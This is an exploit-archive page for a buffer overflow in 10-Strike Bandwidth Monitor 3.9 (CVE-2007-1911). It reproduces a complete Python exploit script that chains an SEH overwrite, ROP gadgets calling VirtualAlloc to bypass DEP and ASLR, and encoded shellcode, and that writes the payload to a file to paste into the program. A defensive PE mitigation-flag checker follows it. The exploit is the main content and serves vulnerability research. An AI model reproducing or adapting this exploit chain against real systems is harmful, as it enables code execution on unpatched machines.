10-Strike Bandwidth Monitor 3.9 Buffer Overflow

CVE: CVE-2007-1911
Category: CWE-119
Price: $5,000
Severity: High
Author: Anonymous
Risk: Critical
Exploitation Type: Remote
Date: 2020-06-08
CVSS vector description

Attack Vector (AV): Network. The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity (AC): Low. The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required (PR): None. The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope (S): An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality (C): High. There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity (I): Low. Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability (A): None. There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060035
Below is a copy:

# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
# 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Prevention (DEP) using Return Oriented Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------
# Python 2 script: '...' and b'...' literals are both str here, and print is a statement
import struct
OS_retSled = '\x41'*400
retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc
# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....
def createRopChain():
    # rop chain generated with mona.py - www.corelan.be
    ropGadgets = [
        0x1202ef02, # POP EBP # RETN [ssleay32.dll]
        0x1202ef02, # skip 4 bytes [ssleay32.dll]
        0x01215f16, # POP EBX # RETN [BandMonitor.exe]
        0xffffffff, #
        0x012175f5, # INC EBX # RETN [BandMonitor.exe]
        0x01056ff7, # INC EBX # RETN [BandMonitor.exe]
        0x011e94d4, # POP EDX # RETN [BandMonitor.exe]
        0xffffefff, # Value to negate, destination value : 0x00001000
        0x01218952, # NEG EDX # RETN [BandMonitor.exe]
        0x011ead1b, # DEC EDX # RETN [BandMonitor.exe]
        0x110c5b5e, # POP ECX # RETN [LIBEAY32.dll]
        0xffffffff, #
        0x11016023, # INC ECX # RETN [LIBEAY32.dll]
    ] + [0x1101597d] * 64 + [ # 64 x INC ECX # RETN [LIBEAY32.dll] (65 INC in total: 0xffffffff + 65 = 0x40)
        0x1202fe55, # POP EDI # RETN [ssleay32.dll]
        0x01225803, # RETN (ROP NOP) [BandMonitor.exe]
        0x1105ed16, # POP ESI # RETN [LIBEAY32.dll]
        0x110495ef, # JMP [EAX] [LIBEAY32.dll]
        0x012126f5, # POP EAX # RETN [BandMonitor.exe]
        0x110e7198, # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
        0x110762c4, # PUSHAD # RETN [LIBEAY32.dll]
        0x110843b4, # ptr to 'push esp # ret ' [LIBEAY32.dll]
    ]
    return ''.join(struct.pack('<I', g) for g in ropGadgets)
ropChain = createRopChain()
nopSled = '\x90'*100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"
OS_nSEH = '\x43'*(4188-600-200-len(ropChain+nopSled+shellcode))
nSEH = '\x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
extra = '\x44'*2000
buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File = 'poc.txt'
try:
    payload = buffer
    f = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except IOError:
    print File + ' failed to create'
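The module table in the exploit header is the real finding for a defender: the chain only works because BandMonitor.exe, ssleay32.dll and LIBEAY32.dll were shipped without ASLR and NXCompat support. The following is an added example, not code from the exploit or from 10-Strike, that audits a PE image's DllCharacteristics for those mitigations before a third-party binary is deployed; the build_header helper constructs a minimal synthetic PE32 header so it runs offline, and the function only reports whether a Load Config directory exists (where a SafeSEH table would live), not the table itself.

```python
import struct

DYNAMIC_BASE, NX_COMPAT, NO_SEH = 0x0040, 0x0100, 0x0400  # IMAGE_DLLCHARACTERISTICS_* flags
DIR_BASERELOC, DIR_LOAD_CONFIG = 5, 10                     # data directory indices


def pe_mitigations(data):
    """Report ASLR/DEP-related flags of a PE image given as bytes (headers only are needed)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]             # e_lfanew -> 'PE\0\0'
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = pe + 4 + 20                                        # optional header follows COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):                          # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    ndirs_off, dirs_off = (92, 96) if magic == 0x10B else (108, 112)
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]

    def dir_present(i):
        if i >= ndirs:
            return False
        rva, size = struct.unpack_from("<II", data, opt + dirs_off + 8 * i)
        return rva != 0 and size != 0

    has_relocs = dir_present(DIR_BASERELOC)
    return {
        "aslr": bool(dllchars & DYNAMIC_BASE) and has_relocs,  # DYNAMIC_BASE is useless without relocs
        "dep": bool(dllchars & NX_COMPAT),
        "no_seh": bool(dllchars & NO_SEH),
        "load_config": dir_present(DIR_LOAD_CONFIG),            # SafeSEH table can only live here
    }


def audit_file(path):
    """Convenience wrapper for an on-disk module (e.g. a DLL shipped with a product)."""
    with open(path, "rb") as fh:
        return pe_mitigations(fh.read())


def build_header(dllchars, relocs):
    """Constructed minimal PE32 header (no sections) used as sample input; not a real module."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                   # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)  # i386, 224-byte opt hdr
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    struct.pack_into("<H", opt, 70, dllchars)
    struct.pack_into("<I", opt, 92, 16)                                  # NumberOfRvaAndSizes
    if relocs:
        struct.pack_into("<II", opt, 96 + 8 * DIR_BASERELOC, 0x3000, 0x100)
    return dos + coff + bytes(opt)
```

A module like BandMonitor.exe in the table above corresponds to build_header(0, False): every flag false, so the image loads at its preferred base with executable gadgets at fixed addresses.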